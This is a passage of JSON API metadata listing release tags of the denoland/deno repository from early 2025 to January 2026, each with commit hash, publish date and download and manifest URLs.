sts_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags